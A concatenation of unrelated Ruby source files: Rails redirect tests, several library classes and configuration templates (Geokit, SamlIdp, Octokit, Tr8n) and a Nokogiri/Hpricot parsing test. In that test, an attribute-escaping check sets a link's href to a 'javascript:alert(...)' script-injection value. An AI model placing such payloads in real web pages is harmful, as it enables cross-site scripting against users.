get :redirect_back_with_status_and_fallback_location_to_another_host
assert_response 307
assert_equal "http://www.rubyonrails.org/", redirect_to_url
end
def test_safe_redirect_back_from_other_host
@request.env["HTTP_REFERER"] = "http://another.host/coming/from"
get :safe_redirect_back_with_status
assert_response 307
assert_equal "http://test.host/things/stuff", redirect_to_url
end
def test_safe_redirect_back_from_the_same_host
referer = "http://test.host/coming/from"
@request.env["HTTP_REFERER"] = referer
get :safe_redirect_back_with_status
assert_response 307
assert_equal referer, redirect_to_url
end
def test_safe_redirect_back_with_no_referer
get :safe_redirect_back_with_status
assert_response 307
assert_equal "http://test.host/things/stuff", redirect_to_url
end
def test_safe_redirect_back_with_no_referer_redirects_to_another_host
get :safe_redirect_back_with_status_and_fallback_location_to_another_host
assert_response 307
assert_equal "http://www.rubyonrails.org/", redirect_to_url
end
def test_redirect_to_record
with_routing do |set|
set.draw do
resources :workshops
ActiveSupport::Deprecation.silence do
get ":controller/:action"
end
end
get :redirect_to_existing_record
assert_equal "http://test.host/workshops/5", redirect_to_url
assert_redirected_to Workshop.new(5)
get :redirect_to_new_record
assert_equal "http://test.host/workshops", redirect_to_url
assert_redirected_to Workshop.new(nil)
end
end
def test_polymorphic_redirect
with_routing do |set|
set.draw do
namespace :internal do
resources :workshops
end
ActiveSupport::Deprecation.silence do
get ":controller/:action"
end
end
get :redirect_to_polymorphic
assert_equal "http://test.host/internal/workshops/5", redirect_to_url
assert_redirected_to [:internal, Workshop.new(5)]
end
end
def test_polymorphic_redirect_with_string_args
with_routing do |set|
set.draw do
namespace :internal do
resources :workshops
end
ActiveSupport::Deprecation.silence do
get ":controller/:action"
end
end
error = assert_raises(ArgumentError) do
get :redirect_to_polymorphic_string_args
end
assert_equal("Please use symbols for polymorphic route arguments.", error.message)
end
end
def test_redirect_to_nil
error = assert_raise(ActionController::ActionControllerError) do
get :redirect_to_nil
end
assert_equal "Cannot redirect to nil!", error.message
end
def test_redirect_to_params
error = assert_raise(ActionController::UnfilteredParameters) do
get :redirect_to_params
end
assert_equal "unable to convert unpermitted parameters to hash", error.message
end
def test_redirect_to_with_block
get :redirect_to_with_block
assert_response :redirect
assert_redirected_to "http://www.rubyonrails.org/"
end
def test_redirect_to_with_block_and_assigns
get :redirect_to_with_block_and_assigns
assert_response :redirect
assert_redirected_to "http://www.rubyonrails.org/"
end
def test_redirect_to_out_of_scope_block
get :redirect_to_out_of_scope_block
assert_response :redirect
assert_redirected_to "http://test.host/redirect/redirect_to_out_of_scope_block"
end
def test_redirect_to_with_block_and_accepted_options
with_routing do |set|
set.draw do
ActiveSupport::Deprecation.silence do
get ":controller/:action"
end
end
get :redirect_to_with_block_and_options
assert_response :redirect
assert_redirected_to "http://test.host/redirect/hello_world"
end
end
end
module ModuleTest
class ModuleRedirectController < ::RedirectController
def module_redirect
redirect_to controller: "/redirect", action: "hello_world"
end
end
class ModuleRedirectTest < ActionController::TestCase
tests ModuleRedirectController
def test_simple_redirect
get :simple_redirect
assert_response :redirect
assert_equal "http://test.host/module_test/module_redirect/hello_world", redirect_to_url
end
def test_simple_redirect_using_options
get :host_redirect
assert_response :redirect
assert_redirected_to action: "other_host", only_path: false, host: "other.test.host"
end
def test_module_redirect
get :module_redirect
assert_response :redirect
assert_equal "http://test.host/redirect/hello_world", redirect_to_url
end
def test_module_redirect_using_options
get :module_redirect
assert_response :redirect
assert_redirected_to controller: "/redirect", action: "hello_world"
end
end
end
| 26.672956 | 105 | 0.754303 |
7a8f1aa09609576a1deeb7ceb12212af414deefb | 2,334 | require 'singleton'
module Cohortly
class TagConfig
include Singleton
attr_accessor :_tags, :_groups, :lookup_table
def self.draw_tags(&block)
instance._tags = []
instance._groups = []
instance.lookup_table = {}
instance.instance_eval(&block)
instance.compile!
instance
end
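    # Illustrative sketch of the DSL this method expects; the tag, controller,
    # and action names below are made up, not taken from this codebase:
    #
    #   Cohortly::TagConfig.draw_tags do
    #     groups :admin, :public
    #     tag :checkout do
    #       controller :orders do
    #         actions :create, :update
    #       end
    #     end
    #   end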
def tag(tag_name, &block)
self._tags << Tag.new(tag_name, &block)
end
def tags(*args, &block)
args.each {|x| tag(x, &block) }
end
def groups(*args)
self._groups = *args.collect(&:to_s)
end
def compile!
self._tags.each do |tag|
tag._controllers.each do |cont|
lookup_table[cont._name] ||= {}
cont._acts.each do |a|
lookup_table[cont._name][a] ||= []
tag_names = lookup_table[cont._name][a] << tag._name
lookup_table[cont._name][a] = tag_names.uniq
end
end
end
end
def tags_for(controller, action = :_all)
res = []
if lookup_table[controller.to_sym]
res += lookup_table[controller.to_sym][action.to_sym] || []
res += lookup_table[controller.to_sym][:_all] || []
end
res.uniq.collect &:to_s
end
def self.tags_for(controller, action = :_all)
return [] if controller.nil?
instance.tags_for(controller, action)
end
def self.all_tags
if instance._tags
instance._tags.collect {|x| x._name.to_s }
else
[]
end
end
def self.all_groups
instance._groups.sort
end
class Tag
attr_accessor :_name, :_controllers
def initialize(tag_name, &block)
self._controllers ||= []
self._name = tag_name.to_sym
instance_eval(&block)
end
def controller(controller_name, &block)
_controllers << Controller.new(controller_name, &block)
end
def controllers(*args)
args.each { |name| controller(name) { actions :_all } }
end
end
class Controller
attr_accessor :_name, :_acts
def initialize(controller_name, &block)
self._acts ||= []
self._name = controller_name.to_sym
self.instance_eval(&block)
end
def actions(*act_names)
self._acts = act_names.collect &:to_sym
end
end
end
end
| 24.568421 | 67 | 0.589117 |
0115d34c2abe602685919eba045b91b9719fd120 | 239 | class Paper < ApplicationRecord
validates :title, :venue, presence: true
validates :year, presence: true, numericality: true
has_and_belongs_to_many :authors
scope :filter_by_year, -> (year) { where('year = ?', year) }
end
| 34.142857 | 64 | 0.702929 |
e9c7e743af9892f528d874dd97d748eedb884e92 | 1,006 | require "carb"
require "carb/service/version"
# Basic interface for service objects. Use rspec shared example
# "Carb::Service" to check if you adhere to the interface correctly. Provides
# currying functionalities
module Carb::Service
# Invokes the service
# @param args [Hash{Symbol => Object}] arguments used in the service
# @return [::Carb::Monads::Either, ::Carb::Monads::Maybe, ::Carb::Monads::Try,
# ::Carb::Monads::Monad] output of the service MUST be an Either monad
def call(**args)
raise NotImplementedError
end
# Pre-fill defaults values for arguments to be passed to {#call}
# @param args [Hash{Symbol => Object}] arguments used in the service
# @return [Curried] service which can be invoked and will fill missing
# args with those supplied when {#curry} was invoked
def curry(**args)
Curried.new(self, args)
end
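  # Illustrative sketch; ChargeCard stands for any class including Carb::Service:
  #
  #   charge_today = ChargeCard.new.curry(date: Date.today)
  #   charge_today.call(amount: 10) # => a monad, as documented for #call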
module_function
def Lambda(callable)
Lambda.new(callable)
end
end
require "carb/service/curried"
require "carb/service/lambda"
| 30.484848 | 80 | 0.72167 |
1125a57f156bbbd39f737752fc066f4f1e5b3d55 | 7,511 | #--
# Copyright (c) 2010-2013 Michael Berkovich, tr8nhub.com
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#++
#
#-- Tr8n::LanguageCaseRule Schema Information
#
# Table name: tr8n_language_case_rules
#
# id INTEGER not null, primary key
# language_case_id integer not null
# language_id integer
# translator_id integer
# definition text not null
# position integer
# created_at datetime not null
# updated_at datetime not null
#
# Indexes
#
# tr8n_lcr_t (translator_id)
# tr8n_lcr_l (language_id)
# tr8n_lcr_lc (language_case_id)
#
#++
class Tr8n::LanguageCaseRule < ActiveRecord::Base
self.table_name = :tr8n_language_case_rules
attr_accessible :language_case_id, :language_id, :translator_id, :definition, :position
attr_accessible :language, :language_case, :translator
belongs_to :language_case, :class_name => "Tr8n::LanguageCase"
belongs_to :language, :class_name => "Tr8n::Language"
belongs_to :translator, :class_name => "Tr8n::Translator"
serialize :definition
def definition
@indifferent_def ||= HashWithIndifferentAccess.new(super)
end
def self.cache_key(id)
"language_case_rule_[#{id}]"
end
def cache_key
self.class.cache_key(id)
end
# TODO: what is this for?
def self.by_id(id)
Tr8n::Cache.fetch(cache_key(id)) do
find_by_id(id)
end
end
def self.gender_options
[["not applicable", "none"], ["unknown", "unknown"], ["male", "male"], ["female", "female"]]
end
def self.condition_options(with_if = false)
opts = [["starts with", "starts_with"], ["does not start with", "does_not_start_with"],
["ends in", "ends_in"], ["does not end in", "does_not_end_in"],
["is", "is"], ["is not", "is_not"]]
return opts unless with_if
opts.each do |opt|
opt[0] = "if #{opt[0]}"
end
opts
end
def self.operation_options
    [["replace with", "replace"], ["prepend", "prepand"], ["append", "append"]]
end
def self.operator_options
[["and", "and"], ["or", "or"]]
end
def evaluate(object, value)
value = value.to_s
if ["male", "female", "unknown", "neutral"].include?(definition["gender"])
object_gender = Tr8n::GenderRule.gender_token_value(object)
return false if definition["gender"] == "male" and object_gender != Tr8n::GenderRule.gender_object_value_for("male")
return false if definition["gender"] == "female" and object_gender != Tr8n::GenderRule.gender_object_value_for("female")
return false if definition["gender"] == "unknown" and object_gender != Tr8n::GenderRule.gender_object_value_for("unknown")
end
result1 = evaluate_part(value, 1)
if definition["multipart"] == "true"
result2 = evaluate_part(value, 2)
return false if definition["operator"] == "and" and !(result1 and result2)
return false if definition["operator"] == "or" and !(result1 or result2)
end
result1
end
def evaluate_part(token_value, index)
values = sanitize_values(definition["value#{index}"])
case definition["part#{index}"]
when "starts_with"
values.each do |value|
return true if token_value.to_s =~ /^#{value.to_s}/
end
return false
when "does_not_start_with"
values.each do |value|
return false if token_value.to_s =~ /^#{value.to_s}/
end
return true
when "ends_in"
values.each do |value|
return true if token_value.to_s =~ /#{value.to_s}$/
end
return false
when "does_not_end_in"
values.each do |value|
return false if token_value.to_s =~ /#{value.to_s}$/
end
return true
when "is"
return values.include?(token_value)
when "is_not"
return !values.include?(token_value)
end
false
end
def apply(value)
value = value.to_s
values = sanitize_values(definition["value1"])
regex = values.join('|')
case definition["operation"]
when "replace"
if definition["part1"] == "starts_with"
return value.gsub(/\b(#{regex})/, definition["operation_value"])
elsif definition["part1"] == "is"
return definition["operation_value"]
elsif definition["part1"] == "ends_in"
return value.gsub(/(#{regex})\b/, definition["operation_value"])
end
when "prepand"
return "#{definition["operation_value"]}#{value}"
when "append"
return "#{value}#{definition["operation_value"]}"
end
value
end
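  # Illustrative example with a made-up definition hash:
  #
  #   rule.definition = { "part1" => "ends_in", "value1" => "s",
  #                       "operation" => "append", "operation_value" => "'" }
  #   rule.apply("users") # => "users'"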
def sanitize_values(values)
return [] unless values
values.split(",").collect{|val| val.strip}
end
def humanize_values(values)
sanitize_values(values).join(", ")
end
def description
return "undefined rule" if definition.blank?
desc = "If"
if definition["gender"] != "none"
desc << " subject"
if ["male", "female"].include?(definition["gender"])
desc << " is a <strong>#{definition["gender"]}</strong>"
else
desc << " <strong>has an unknown gender</strong>"
end
end
desc << " and" unless desc == "If"
desc << " token value"
desc << describe_part(1)
if ["true", true].include?(definition["multipart"])
desc << " " << definition["operator"].to_s
desc << describe_part(2)
end
desc << ", then"
case definition["operation"]
when "replace" then desc << " replace it with"
      when "prepand" then desc << " prepend the value with"
when "append" then desc << " append the value with"
end
desc << " <strong>'" << humanize_values(definition["operation_value"]) << "'</strong> "
desc.html_safe
end
def describe_part(index)
desc = ""
case definition["part#{index}"]
when "starts_with" then desc << " starts with"
when "does_not_start_with" then desc << " does not start with"
when "ends_in" then desc << " ends in"
when "does_not_end_in" then desc << " does not end in"
when "is" then desc << " is"
when "is_not" then desc << " is not"
end
desc << " <strong>'" << humanize_values(definition["value#{index}"]) << "'</strong>"
desc.html_safe
end
end | 33.088106 | 128 | 0.624018 |
7a5b6f70ca86351a92a4465e00a6ead87f8b4214 | 278 | class CreateClickThroughs < ActiveRecord::Migration[4.2]
def up
create_table :click_throughs do |t|
t.string 'url'
t.string 'source_url'
t.string 'user_id', null: true
t.timestamps
end
end
def down
drop_table :click_throughs
end
end
| 18.533333 | 56 | 0.661871 |
616927446bf173e019c11bb35f727f69a1bcbc3a | 493 | module Jekyll
class PageTag < Liquid::Tag
def initialize(tag_name, text, tokens)
super
@text = text.strip.downcase
end
def render(context)
site = context.registers[:site]
page = site.collections['pages'].docs.select{|p|p.data['title'].gsub(/\"/,'').downcase == @text}.first
if page.present?
"<a href='#{site.baseurl}#{page.url}'>#{page.data['title']}</a>"
end
end
end
end
Liquid::Template.register_tag('page', Jekyll::PageTag) | 25.947368 | 108 | 0.616633 |
081a4aadc54f0b3c3a28459bab8b3c1c72f3e4be | 4,720 | # These defaults are used in Geokit::Mappable.distance_to and acts_as_mappable
Geokit::default_units = :kms #:miles :kms, :nms, :meters
Geokit::default_formula = :sphere
# This is the timeout value in seconds to be used for calls to the geocoder web
# services. For no timeout at all, comment out the setting. The timeout unit
# is in seconds.
Geokit::Geocoders::request_timeout = 3
# This setting can be used if web service calls must be routed through a proxy.
# These setting can be nil if not needed, otherwise, a valid URI must be
# filled in at a minimum. If the proxy requires authentication, the username
# and password can be provided as well.
# Geokit::Geocoders::proxy = 'https://user:password@host:port'
# This is your yahoo application key for the Yahoo Geocoder.
# See http://developer.yahoo.com/faq/index.html#appid
# and http://developer.yahoo.com/maps/rest/V1/geocode.html
# Geokit::Geocoders::YahooGeocoder.key = 'REPLACE_WITH_YOUR_YAHOO_KEY'
# Geokit::Geocoders::YahooGeocoder.secret = 'REPLACE_WITH_YOUR_YAHOO_SECRET'
# This is your Google Maps geocoder keys (all optional).
# See http://www.google.com/apis/maps/signup.html
# and http://www.google.com/apis/maps/documentation/#Geocoding_Examples
# Geokit::Geocoders::GoogleGeocoder.client_id = ''
# Geokit::Geocoders::GoogleGeocoder.cryptographic_key = ''
# Geokit::Geocoders::GoogleGeocoder.channel = ''
# You can also use the free API key instead of signed requests
# See https://developers.google.com/maps/documentation/geocoding/#api_key
# Geokit::Geocoders::GoogleGeocoder.api_key = ''
# You can also set multiple API KEYS for different domains that may be directed
# to this same application.
# The domain from which the current user is being directed will automatically
# be updated for Geokit via
#  the GeocoderControl class, which gets its before filter mixed
# into the ActionController.
# You define these keys with a Hash as follows:
# Geokit::Geocoders::google = {
# 'rubyonrails.org' => 'RUBY_ON_RAILS_API_KEY',
# ' ruby-docs.org' => 'RUBY_DOCS_API_KEY' }
# This is your username and password for geocoder.us.
# To use the free service, the value can be set to nil or false. For
# usage tied to an account, the value should be set to username:password.
# See http://geocoder.us
# and http://geocoder.us/user/signup
# Geokit::Geocoders::UsGeocoder.key = 'username:password'
# This is your authorization key for geocoder.ca.
# To use the free service, the value can be set to nil or false. For
# usage tied to an account, set the value to the key obtained from
# Geocoder.ca.
# See http://geocoder.ca
# and http://geocoder.ca/?register=1
# Geokit::Geocoders::CaGeocoder.key = 'KEY'
# This is your username key for geonames.
# To use this service either free or premium, you must register a key.
# See http://www.geonames.org
# Geokit::Geocoders::GeonamesGeocoder.key = 'KEY'
# Most other geocoders need either no setup or a key
# Geokit::Geocoders::BingGeocoder.key = ''
# Geokit::Geocoders::MapQuestGeocoder.key = ''
# Geokit::Geocoders::YandexGeocoder.key = ''
# Geokit::Geocoders::MapboxGeocoder.key = 'ACCESS_TOKEN'
# Geokit::Geocoders::OpencageGeocoder.key = 'some_api_key'
# Geonames has a free service and a premium service, each using a different URL
# GeonamesGeocoder.premium = true will use http://ws.geonames.net (premium)
# GeonamesGeocoder.premium = false will use http://api.geonames.org (free)
# Geokit::Geocoders::GeonamesGeocoder.premium = false
# require "external_geocoder.rb"
# Please see the section "writing your own geocoders" for more information.
# Geokit::Geocoders::external_key = 'REPLACE_WITH_YOUR_API_KEY'
# This is the order in which the geocoders are called in a failover scenario
# If you only want to use a single geocoder, put a single symbol in the array.
# Valid symbols are :google, :yahoo, :us, and :ca.
# Be aware that there are Terms of Use restrictions on how you can use the
# various geocoders. Make sure you read up on relevant Terms of Use for each
# geocoder you are going to use.
# Geokit::Geocoders::provider_order = [:google,:us]
# The IP provider order. Valid symbols are :ip,:geo_plugin.
# As before, make sure you read up on relevant Terms of Use for each.
# Geokit::Geocoders::ip_provider_order = [:external,:geo_plugin,:ip]
# Disable HTTPS globally. This option can also be set on individual
# geocoder classes.
# Geokit::Geocoders::secure = false
# Control verification of the server certificate for geocoders using HTTPS
# Geokit::Geocoders::ssl_verify_mode = OpenSSL::SSL::VERIFY_(PEER/NONE)
# Setting this to VERIFY_NONE may be needed on systems that don't have
# a complete or up to date root certificate store. Only applies to
# the Net::HTTP adapter.
| 46.732673 | 79 | 0.758686 |
ed90d10f6aabd453ca8aef1d1dd5f9fd122a7b60 | 1,136 | require 'tempfile'
Given /^I already have a Berkshelf config file$/ do
path = Tempfile.new('berkshelf').path
config = Berkshelf::Config.new(path)
config.save
Berkshelf.config = config
ENV['BERKSHELF_CONFIG'] = path
set_env 'BERKSHELF_CONFIG', path
end
Given /^I have a Berkshelf config file containing:$/ do |contents|
path = Berkshelf.config.path
FileUtils.mkdir_p(Pathname.new(path).dirname.to_s)
File.open(path, 'w+') { |f| f.write(contents) }
Berkshelf.config = Berkshelf::Config.from_file(path)
end
Then /^a Berkshelf config file should exist and contain:$/ do |table|
# Have to reload the config...
Berkshelf.config.reload
check_file_presence([Berkshelf.config.path], true)
table.raw.each do |key, value|
expect(Berkshelf.config[key]).to eq(value)
end
end
Then /^a Berkshelf config file should exist at "(.+)" and contain:$/ do |path, table|
check_file_presence([path], true)
path = File.expand_path(File.join('tmp', 'aruba', path))
Berkshelf.config = Berkshelf::Config.from_file(path)
table.raw.each do |key, value|
expect(Berkshelf.config[key]).to eq(value)
end
end
| 25.818182 | 85 | 0.711268 |
b95d2913915f48b579db807a5e8de9daa4b32967 | 902 | require 'sinatra/base'
require_relative 'feed'
class NowPlaying < Sinatra::Base
set :root, File.expand_path("#{File.dirname(__FILE__)}/../app")
set :public_folder, 'public'
before do
content_type :json
headers 'Access-Control-Allow-Origin' => '*',
'Access-Control-Allow-Methods' => %w[OPTIONS GET]
end
# Allow the app to serve static files from the 'public' directory in :root
enable :static
def output_feed(klass)
feed = klass.new
feed.read
JSON.generate(feed.translate_feed)
end
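  # The feed routes below respond with JSON built by #output_feed, e.g.
  # `curl http://localhost:9292/dronezone` when served via rackup (the host
  # and port here are illustrative and depend on how the app is run).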
get '/' do
content_type :html
send_file File.join(settings.public_folder, 'index.html')
end
get '/counterstream' do
output_feed(Counterstream)
end
get '/dronezone' do
output_feed(DroneZone)
end
get '/earwaves' do
output_feed(Earwaves)
end
get '/q2' do
output_feed(Q2)
end
get '/yle' do
output_feed(Yle)
end
end
| 18.791667 | 76 | 0.669623 |
e269d97f3f44e24f6c4901fe214f146ffd482ef8 | 723 | # frozen_string_literal: true
require 'rails/generators'
# Creates the Queues initializer file for Rails apps.
#
# @example Invocation from terminal
# rails generate queues_rabbit
#
class QueuesRabbitGenerator < Rails::Generators::Base
desc "Description:\n This prepares Rails for RabbitMQ Queues"
source_root File.expand_path('templates', __dir__)
desc 'Initialize Rails for RabbitMQ Queues'
def generate_layout
if !File.exist?('app/queues/application_queue.rb')
generate 'queues'
end
template 'schema.rb', 'app/queues/rabbits/schema.rb'
template 'queue.rb', 'app/queues/rabbits/queues/my_queue.rb'
template 'exchange.rb', 'app/queues/rabbits/exchanges/my_exchange.rb'
end
end
| 26.777778 | 73 | 0.748271 |
ff0d4f2cedeac556a5377674eaad667f1a0eaa45 | 536 | # frozen_string_literal: true
# Synchronize political_force with main site
class NetworkPoliticalForceSyncJob < ApplicationJob
queue_as :default
# @param [Integer] entity_id
# @param [TrueClass|FalseClass] for_update
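  # @example Enqueue a sync for an existing record (illustrative)
  #   NetworkPoliticalForceSyncJob.perform_later(political_force.id, true)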
def perform(entity_id, for_update = false)
entity = PoliticalForce.find_by(id: entity_id)
return if entity.nil?
handler = NetworkManager::PoliticalForceHandler.new
return unless Rails.env.production?
for_update ? handler.update_remote(entity) : handler.create_remote(entity)
end
end
| 25.52381 | 78 | 0.768657 |
e8721a736ba69050ac8cfcb646d928ec90cdda48 | 829 | Gem::Specification.new do |s|
s.name = 'acts_as_commentable_with_threading'
s.version = '2.0.1'
s.date = '2015-12-22'
s.summary = 'Polymorphic comments Rails gem - Rails 4+ only'
s.email = '[email protected]'
s.homepage = 'http://github.com/elight/acts_as_commentable_with_threading'
s.description = 'Polymorphic threaded comments Rails gem for Rails 4+'
s.authors = ['Evan Light', 'Jack Dempsey', 'Xelipe', 'xxx']
s.files = `git ls-files`.split("\n")
s.test_files = `git ls-files -- spec/*`.split("\n")
s.add_development_dependency 'rake'
s.add_development_dependency 'rspec', '>= 3.0'
s.add_development_dependency 'rails', '>= 4.0'
s.add_dependency 'activerecord', '>= 4.0'
s.add_dependency 'activesupport', '>= 4.0'
s.add_dependency 'awesome_nested_set', '>= 3.1.1'
end
| 39.47619 | 76 | 0.676719 |
abd40d525a298186156d72ad3ff6a4529ea54490 | 2,641 | # encoding: utf-8
module SamlIdp
require 'active_support/all'
require 'saml_idp/saml_response'
require 'saml_idp/xml_security'
require 'saml_idp/configurator'
require 'saml_idp/controller'
require 'saml_idp/default'
require 'saml_idp/metadata_builder'
require 'saml_idp/version'
require 'saml_idp/engine' if defined?(::Rails) && Rails::VERSION::MAJOR > 2
def self.config
@config ||= SamlIdp::Configurator.new
end
def self.configure
yield config
end
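  # Illustrative configuration sketch; the attribute shown is an assumption and
  # depends on what SamlIdp::Configurator actually exposes:
  #
  #   SamlIdp.configure do |config|
  #     config.base_saml_location = "https://idp.example.com/saml"
  #   end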
def self.metadata
@metadata ||= MetadataBuilder.new(config)
end
end
# TODO Needs extraction out
module Saml
module XML
module Namespaces
METADATA = "urn:oasis:names:tc:SAML:2.0:metadata"
ASSERTION = "urn:oasis:names:tc:SAML:2.0:assertion"
SIGNATURE = "http://www.w3.org/2000/09/xmldsig#"
PROTOCOL = "urn:oasis:names:tc:SAML:2.0:protocol"
module Statuses
SUCCESS = "urn:oasis:names:tc:SAML:2.0:status:Success"
end
module Consents
UNSPECIFIED = "urn:oasis:names:tc:SAML:2.0:consent:unspecified"
end
module AuthnContext
module ClassRef
PASSWORD = "urn:oasis:names:tc:SAML:2.0:ac:classes:Password"
PASSWORD_PROTECTED = "urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport"
end
end
module Methods
BEARER = "urn:oasis:names:tc:SAML:2.0:cm:bearer"
end
module Formats
module Attr
URI = "urn:oasis:names:tc:SAML:2.0:attrname-format:uri"
end
module NameId
EMAIL_ADDRESS = "urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress"
TRANSIENT = "urn:oasis:names:tc:SAML:2.0:nameid-format:transient"
PERSISTENT = "urn:oasis:names:tc:SAML:2.0:nameid-format:persistent"
end
end
end
class Document < Nokogiri::XML::Document
def signed?
!!xpath("//ds:Signature", ds: signature_namespace).first
end
def options_have_signature(options)
options[:get_params] && options[:get_params][:Signature]
end
private :options_have_signature
def valid_signature?(fingerprint, options = {})
(signed? || options_have_signature(options)) &&
signed_document.validate(fingerprint, :soft, options)
end
def signed_document
SamlIdp::XMLSecurity::SignedDocument.new(to_xml)
end
def signature_namespace
Namespaces::SIGNATURE
end
def to_xml
super(
save_with: Nokogiri::XML::Node::SaveOptions::AS_XML | Nokogiri::XML::Node::SaveOptions::NO_DECLARATION
).strip
end
end
end
end
| 26.94898 | 112 | 0.654676 |
7a7bb6886a372e21a122a0dde834820cb97e4cd7 | 1,601 | module Octokit
# Class to parse GitHub repository owner and name from
# URLs and to generate URLs
class Repository
attr_accessor :owner, :name, :id
# Instantiate from a GitHub repository URL
#
# @return [Repository]
def self.from_url(url)
Repository.new(URI.parse(url).path[1..-1])
end
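    # Illustrative example (repository is made up):
    #
    #   repo = Octokit::Repository.from_url("https://github.com/octocat/hello-world")
    #   repo.slug # => "octocat/hello-world"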
def initialize(repo)
case repo
when Integer
@id = repo
when String
@owner, @name = repo.split('/')
when Repository
@owner = repo.owner
@name = repo.name
when Hash
@name = repo[:repo] ||= repo[:name]
@owner = repo[:owner] ||= repo[:user] ||= repo[:username]
end
end
# Repository owner/name
# @return [String]
def slug
"#{@owner}/#{@name}"
end
alias :to_s :slug
# @return [String] Repository API path
def path
return named_api_path if @owner && @name
return id_api_path if @id
end
# Get the api path for a repo
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @return [String] Api path.
def self.path repo
new(repo).path
end
# @return [String] Api path for owner/name identified repos
def named_api_path
"repos/#{slug}"
end
# @return [String] Api path for id identified repos
def id_api_path
"repositories/#{@id}"
end
# Repository URL based on {Octokit::Client#web_endpoint}
# @return [String]
def url
"#{Octokit.web_endpoint}#{slug}"
end
alias :user :owner
alias :username :owner
alias :repo :name
end
end
| 22.549296 | 74 | 0.598376 |
6a709a88f6baf790abcd11a766ae8f9bc81af517 | 2,890 | require File.expand_path(File.join(File.dirname(__FILE__), '..', "helper"))
require File.join(File.dirname(__FILE__),"load_files")
class TestPreserved < Nokogiri::TestCase
def assert_roundtrip str
doc = Nokogiri.Hpricot(str)
yield doc if block_given?
str2 = doc.to_original_html
[*str].zip([*str2]).each do |s1, s2|
assert_equal s1, s2
end
end
def assert_html str1, str2
doc = Nokogiri.Hpricot(str2)
yield doc if block_given?
assert_equal str1, doc.to_original_html
end
####
# Not supporting to_original_html
#def test_simple
# str = "<p>Hpricot is a <b>you know <i>uh</b> fine thing.</p>"
# assert_html str, str
# assert_html "<p class=\"new\">Hpricot is a <b>you know <i>uh</b> fine thing.</p>", str do |doc|
# (doc/:p).set('class', 'new')
# end
#end
####
# Not supporting to_original_html
#def test_parent
# str = "<html><base href='/'><head><title>Test</title></head><body><div id='wrap'><p>Paragraph one.</p><p>Paragraph two.</p></div></body></html>"
# assert_html str, str
# assert_html "<html><base href='/'><body><div id=\"all\"><div><p>Paragraph one.</p></div><div><p>Paragraph two.</p></div></div></body></html>", str do |doc|
# (doc/:head).remove
# (doc/:div).set('id', 'all')
# (doc/:p).wrap('<div></div>')
# end
#end
# Not really a valid test. If libxml can figure out the encoding of the file,
# it will use that encoding, otherwise it uses the &#xwhatever so that no data
# is lost.
#
# libxml on OSX can't figure out the encoding, so this tests passes. linux
# can figure out the encoding, so it fails.
#def test_escaping_of_contents
# doc = Nokogiri.Hpricot(TestFiles::BOINGBOING)
# assert_equal "Fukuda’s Automatic Door opens around your body as you pass through it. The idea is to save energy and keep the room clean.", doc.at("img[@alt='200606131240']").next.to_s.strip
#end
####
# Modified. No.
#def test_files
# assert_roundtrip TestFiles::BASIC
# assert_roundtrip TestFiles::BOINGBOING
# assert_roundtrip TestFiles::CY0
#end
####
# Modified.. When calling "to_html" on the document, proper html/doc tags
# are produced too.
def test_escaping_of_attrs
# ampersands in URLs
str = %{<a href="http://google.com/search?q=nokogiri&l=en">Google</a>}
link = (doc = Nokogiri.Hpricot(str)).at(:a)
assert_equal "http://google.com/search?q=nokogiri&l=en", link['href']
assert_equal "http://google.com/search?q=nokogiri&l=en", link.get_attribute('href')
assert_equal "http://google.com/search?q=nokogiri&l=en", link.raw_attributes['href']
assert_equal str, link.to_html
# alter the url
link['href'] = "javascript:alert(\"AGGA-KA-BOO!\")"
assert_equal %{<a href="javascript:alert("AGGA-KA-BOO!")">Google</a>}, link.to_html.gsub(/%22/, '"')
end
end
| 37.051282 | 201 | 0.658478 |
1d009d21ebe8fc150c676da5cf4bad7bcabe8eaa | 1,312 | # frozen_string_literal: true
module Types
class EveAncestryType < Types::BaseObject
description "Ancestry object"
field :id, ID,
method: :ancestry_id,
description: "Ancestry ID",
null: false
field :name, GraphQL::Types::JSON,
description: "Name",
null: true
field :description, GraphQL::Types::JSON,
description: "Description",
null: true
field :bloodline_id, Integer,
description: "Bloodline ID",
null: true
field :bloodline, Types::EveBloodlineType,
description: "Bloodline",
null: true
field :icon_id, Integer,
description: "Icon ID",
null: true
field :icon, Types::EveIconType,
description: "Icon",
null: true
field :short_description, String,
description: "Short description",
null: true
def name
{
en: object.name_en,
de: object.name_de,
fr: object.name_fr,
ja: object.name_ja,
ru: object.name_ru,
ko: object.name_ko
}
end
def description
{
en: object.description_en,
de: object.description_de,
fr: object.description_fr,
ja: object.description_ja,
ru: object.description_ru,
ko: object.description_ko
}
end
end
end
| 20.825397 | 46 | 0.601372 |
61b13693010a4930a4784b0a2b0e77e2074f30f4 | 497 | require "spec_helper"
describe SpreeShopifyImporter::Importers::TaxonImporterJob, type: :job do
subject { described_class.new }
describe "#perfrom" do
let(:resource) { double("ShopifyCustomCollection") }
it "calls a importer service" do
expect(SpreeShopifyImporter::Importers::TaxonImporter).to receive(:new).and_call_original
expect_any_instance_of(SpreeShopifyImporter::Importers::TaxonImporter).to receive(:import!)
subject.perform(resource)
end
end
end
| 29.235294 | 97 | 0.752515 |
28061442e786f36c315d6624edb7c1d35b81d8d4 | 20,093 | # encoding: UTF-8
require 'cxxstdlib'
require 'exceptions'
require 'formula'
require 'keg'
require 'tab'
require 'bottles'
require 'caveats'
require 'cleaner'
require 'formula_cellar_checks'
require 'install_renamed'
require 'cmd/tap'
